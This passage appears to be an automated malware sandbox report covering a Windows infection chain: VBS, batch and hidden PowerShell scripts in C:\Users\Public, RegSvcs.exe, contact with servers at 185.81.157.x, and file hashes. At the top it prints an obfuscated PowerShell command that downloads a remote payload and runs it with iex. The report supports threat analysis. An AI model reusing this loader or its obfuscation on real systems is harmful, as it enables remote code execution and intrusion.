¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.157.81.185.in-addr.arpa | udp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| FR | 185.81.157.183:9696 | tcp | |
| FR | 185.81.157.183:9696 | tcp |
Files
memory/2056-5-0x00000210F1F70000-0x00000210F1F92000-memory.dmp
memory/2056-6-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/2056-7-0x00000210F2010000-0x00000210F2020000-memory.dmp
memory/2056-8-0x00000210F2010000-0x00000210F2020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5gokor4.mpf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2056-20-0x00000210F2010000-0x00000210F2020000-memory.dmp
memory/2056-23-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4800-27-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/4800-28-0x0000021DEC520000-0x0000021DEC530000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa8efa56e1e40374bbd21e0e469dceb7 |
| SHA1 | 33a592799d4898c6efdd29e132f2f76ec51dbc08 |
| SHA256 | 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf |
| SHA512 | ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096 |
C:\Users\Public\hich.ps1
| MD5 | 8469f5b76df0f510fe02b1eab0f57226 |
| SHA1 | 7ad6c79dc42aafd7b813353c8bdcb1204c376621 |
| SHA256 | a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279 |
| SHA512 | 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4 |
memory/4800-40-0x0000021DEE6A0000-0x0000021DEE6D4000-memory.dmp
memory/3484-42-0x0000000000400000-0x0000000000416000-memory.dmp
memory/4800-41-0x0000021DEC520000-0x0000021DEC530000-memory.dmp
memory/4800-44-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/3484-45-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3484-46-0x0000000003200000-0x0000000003210000-memory.dmp
memory/3484-47-0x0000000005FC0000-0x0000000006564000-memory.dmp
memory/3484-48-0x0000000005C00000-0x0000000005C92000-memory.dmp
memory/3484-49-0x0000000005BF0000-0x0000000005BFA000-memory.dmp